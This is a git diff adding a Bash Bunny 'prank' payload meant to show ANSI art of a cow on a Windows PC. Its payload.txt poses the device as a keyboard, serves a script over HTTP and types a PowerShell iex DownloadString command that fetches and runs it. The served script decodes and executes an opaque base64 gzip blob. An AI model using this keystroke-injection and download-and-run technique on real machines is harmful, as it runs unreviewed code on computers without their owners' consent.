diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo b/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo new file mode 100644 index 00000000..0de8e02c --- /dev/null +++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/moo @@ -0,0 +1,60 @@ +# Ansi art base64 encoded gzip file +$data = 'H4sIAAAAAAAEAO3aTUrDQBQH8L3gHdLiNYSCgkdw3UVBF1aoBa+QpU2MBUHwLB6lJ9EWC8nMm3kf838tUsmsTOe9/y+TrxYvltVlNRmfn23empMaSPFqNzxiIivjxVg3vqaXGBIQXtBZXJgRW+1QYnNMYCmZuP363G8FCQ0h7XX6 +iVvFyrYD7XZ2rY+3CjPEx4+ZSo16WKclYTlbs58UC+vIGYSqKQwNrLOi32aUheYwoqY3m3Yl/yDmsFX6GdRXF00JNP3mmvyS2UHbfEbRPbFNSHrnmlmRqhN3ZYNK7+9x4bafoBATgnaDbMln1T2xCEspJI1SKCyW7cgEUeZO79Il +Uhog8dlpbgJgeGa6Q36yd9Sev0o0s/wNqRxph+QzbgbRCQEnyBAogSyX5nYMSi9rht0wR135LE48XokhXcnESzTEw6nkGomMbO4Jy13GwftWnlRzvEx7Z11OTb2GZYiDD7AqT60FvDPbFtUo5bGH9Kou0L/q1YvN5zFUqwDbHnVI +lMZlezTbNnT2YFlKD6x2UQ3LotY1/jS+gyKu5WfxY+p0WTE/O2BpOaCr7lA0EPBfdxwaAlj4NNvv9pDxXXErxydRToEXhIoBrbJ1yitI6wC+IcrDokZRHl6sLN+9broX6Fhj0Tpxw1ftVtfTxWI2r27v50/V8m5WXT0+VzfTh9lo +9LNT0CfuWXaGakb3jl6vD2zCU/zXs/HkGzPXN594JwAA' + +## Decompress the ansi art +$binaryData = [System.Convert]::FromBase64String($data) +$ms = New-Object System.IO.MemoryStream +$ms.Write($binaryData, 0, $binaryData.Length) +$ms.Seek(0,0) | Out-Null +$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]"Decompress") +$sr = New-Object System.IO.StreamReader($cs) +$structure = $sr.ReadToEnd() +iex $structure + +Clear-Host +# Resize window +1..4 | % { +try +{ + $host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 80,47 +} +catch {} +} + +# Loop each char +$t | % {$_[0..($_.length)]} | % { + # Set colour + switch ($_) { + "▒" { + $c = "Green" + $b = "Green" + } + "░" { + $c = "DarkYellow" + $b = "Yellow" + } + "▓" { + # to get pink + $c = "Red" + $b = "White" + } + "█" { + $c = "Black" + $b = "Black" + } + " " { + $c = "White" + $b = "White" + } + default { + $c = "White" + $b = "DarkBlue" + } + } + # Write char + Write-Host $_ -NoNewline -ForegroundColor $c -backgroundcolor $b +} \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt b/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt new file mode 100644 index 00000000..17c16e9e --- /dev/null +++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/payload.txt @@ -0,0 +1,38 @@ +#!/bin/bash +# Title: ANSI Seb's Cow +# Description: Display an ANSI art Seb's Cow +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID +# Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (compression) + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 200 +RUN WIN Powershell +QUACK DELAY 500 +QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/moo\")" +QUACK ENTER +LED FINISH + diff --git a/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md b/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md new file mode 100644 index 00000000..4a58fb47 --- /dev/null +++ b/payloads/library/prank/Win_PoSH_AnsiSebsCow/readme.md @@ -0,0 +1,23 @@ +# ANSI Seb's Cow +- Author: Cribbit +- Version: 1.0 +- Target: Windows (Powershell 5.1+) +- Category: Pranks +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run +- Props: Hak5's Sebs Cow, Audibleblink (Python Server) and Lee Holmes (Compression) + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Shows an ansi art image of seb's cow in a powershell window + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file